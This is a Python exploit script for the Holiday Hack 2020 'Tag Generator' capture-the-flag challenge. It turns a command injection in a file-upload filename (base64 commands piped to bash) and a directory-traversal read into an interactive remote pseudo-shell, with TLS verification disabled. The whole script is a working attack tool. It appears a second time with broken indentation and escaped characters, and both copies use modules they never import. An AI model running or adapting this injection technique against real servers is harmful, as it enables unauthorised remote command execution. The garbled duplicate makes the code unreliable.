reigningshells/HH2020-tag-generator-pseudo-shell.py

## HH2020-tag-generator-pseudo-shell.py
#!/usr/bin/env python3

import sys
import argparse
import string
import random
import requests
import urllib3
import base64
import readline

# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Exploit command injection
def run_command(cmd):
	url = 'https://tag-generator.kringlecastle.com/upload'
	headers = {'User-Agent': useragent}
	encoded_command = base64.b64encode(cmd.encode()).decode()
	files = {'my_file[]': ("test.'; echo '{0}' | base64 -d | bash > {1}; png".format(encoded_command,random_filename), 'safe', 'image/png')}
	try:
		requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)
		return
	except Exception as e:
		print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

# Exploit directory traversal
def get_results():
	url = 'https://tag-generator.kringlecastle.com/image?id={0}'.format(random_filename)
	headers = {'User-Agent': useragent}
	try:
		r = requests.get(url,headers=headers,proxies=proxies,verify=False)
		if r.status_code == requests.codes.ok:
			return r.text
		else:
			return ''
	except Exception as e:
		print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

# Primary function to call to execute a command
def execute_command(cmd):
	run_command(cmd)
	output = get_results()
	run_command('echo \'\'')
	return output

# Cleanup our temporary file we have been writing to, don't want to leave a mess
def clean_up():
	url = 'https://tag-generator.kringlecastle.com/upload'
	headers = {'User-Agent': useragent}
	cmd = 'rm {0}'.format(random_filename)
	files = {'my_file[]': ("test.'; {0}; png".format(cmd), 'safe', 'image/png')}
	r = requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)

if __name__ == "__main__":

	parser = argparse.ArgumentParser(
	description='Holiday Hack 2020 Tag Generator Pseudo Shell',
	epilog = '''
Examples:
{0}
{0} -p http://127.0.0.1:8080
{0} -p http://127.0.0.1:8080 -u \'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \''''.format(sys.argv[0]),
	formatter_class=argparse.RawDescriptionHelpFormatter)

	parser.add_argument('-p', '--proxy', help='Proxy example: http://127.0.0.1:8080', required=False, default=None, type=str, dest='proxy')
	parser.add_argument('-u', '--useragent', help='User agent string to make requests with', required=False, default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', type=str, dest='useragent')

	args = parser.parse_args()

	# Global Variables

	useragent = args.useragent
	if args.proxy:
		proxies = {'http': args.proxy, 'https': args.proxy}
	else:
		proxies = None

	random_filename = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(32))

	# Populate the prompt

	username = execute_command("whoami").strip()
	if len(username) == 0:
		exit(1)

	hostname = execute_command("hostname").strip()

	path = execute_command("pwd").strip()

	print("\n[*] Returning prompt!\n")

	# Interact with pseudo shell

	try:
		while True:
			prompt = username + "@" + hostname + ":" + path + "$ "
			cmd = input(prompt)
			if cmd == "exit":
				print("\n[*] Goodbye!\n")
				break
			elif cmd.startswith("cd "):
				chars = set(";&|")
				if any((c in chars) for c in cmd):
					print("[!] This shell only supports cd as a standalone command.")
				else:
					cmd = cmd.split()
					tmpPath = " ".join(cmd[1:])
					if tmpPath == "..":
						if len(path.split("/")) > 2:
							tmpPath = "/".join(path.split("/")[:-1])
						else:
							tmpPath = "/"
					cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
					tmpPath = execute_command(cmd).strip()
					if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
						path = tmpPath
					else:
						path = tmpPath.split('\n')[0]
			elif cmd == "clear":
				os.system("clear")
			else:
				cmd = "cd " + path + " && " + cmd
				results = execute_command(cmd)
				if len(results) != 0:
					print(results)

		clean_up()

	except KeyboardInterrupt:
		print("\n\n[*] Goodbye!\n")
		clean_up()
	#!/usr/bin/env python3

	import sys
	import argparse
	import string
	import random
	import requests
	import urllib3
	import base64
	import readline

	# Nobody wants to see SSL warnings :-P
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

	# Exploit command injection
	def run_command(cmd):
	url = 'https://tag-generator.kringlecastle.com/upload'
	headers = {'User-Agent': useragent}
	encoded_command = base64.b64encode(cmd.encode()).decode()
	files = {'my_file[]': ("test.'; echo '{0}' \| base64 -d \| bash > {1}; png".format(encoded_command,random_filename), 'safe', 'image/png')}
	try:
	requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)
	return
	except Exception as e:
	print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

	# Exploit directory traversal
	def get_results():
	url = 'https://tag-generator.kringlecastle.com/image?id={0}'.format(random_filename)
	headers = {'User-Agent': useragent}
	try:
	r = requests.get(url,headers=headers,proxies=proxies,verify=False)
	if r.status_code == requests.codes.ok:
	return r.text
	else:
	return ''
	except Exception as e:
	print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

	# Primary function to call to execute a command
	def execute_command(cmd):
	run_command(cmd)
	output = get_results()
	run_command('echo \'\'')
	return output

	# Cleanup our temporary file we have been writing to, don't want to leave a mess
	def clean_up():
	url = 'https://tag-generator.kringlecastle.com/upload'
	headers = {'User-Agent': useragent}
	cmd = 'rm {0}'.format(random_filename)
	files = {'my_file[]': ("test.'; {0}; png".format(cmd), 'safe', 'image/png')}
	r = requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)

	if __name__ == "__main__":

	parser = argparse.ArgumentParser(
	description='Holiday Hack 2020 Tag Generator Pseudo Shell',
	epilog = '''
	Examples:
	{0}
	{0} -p http://127.0.0.1:8080
	{0} -p http://127.0.0.1:8080 -u \'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \''''.format(sys.argv[0]),
	formatter_class=argparse.RawDescriptionHelpFormatter)

	parser.add_argument('-p', '--proxy', help='Proxy example: http://127.0.0.1:8080', required=False, default=None, type=str, dest='proxy')
	parser.add_argument('-u', '--useragent', help='User agent string to make requests with', required=False, default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', type=str, dest='useragent')

	args = parser.parse_args()

	# Global Variables

	useragent = args.useragent
	if args.proxy:
	proxies = {'http': args.proxy, 'https': args.proxy}
	else:
	proxies = None

	random_filename = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(32))

	# Populate the prompt

	username = execute_command("whoami").strip()
	if len(username) == 0:
	exit(1)

	hostname = execute_command("hostname").strip()

	path = execute_command("pwd").strip()

	print("\n[*] Returning prompt!\n")

	# Interact with pseudo shell

	try:
	while True:
	prompt = username + "@" + hostname + ":" + path + "$ "
	cmd = input(prompt)
	if cmd == "exit":
	print("\n[*] Goodbye!\n")
	break
	elif cmd.startswith("cd "):
	chars = set(";&\|")
	if any((c in chars) for c in cmd):
	print("[!] This shell only supports cd as a standalone command.")
	else:
	cmd = cmd.split()
	tmpPath = " ".join(cmd[1:])
	if tmpPath == "..":
	if len(path.split("/")) > 2:
	tmpPath = "/".join(path.split("/")[:-1])
	else:
	tmpPath = "/"
	cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
	tmpPath = execute_command(cmd).strip()
	if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
	path = tmpPath
	else:
	path = tmpPath.split('\n')[0]
	elif cmd == "clear":
	os.system("clear")
	else:
	cmd = "cd " + path + " && " + cmd
	results = execute_command(cmd)
	if len(results) != 0:
	print(results)

	clean_up()

	except KeyboardInterrupt:
	print("\n\n[*] Goodbye!\n")
	clean_up()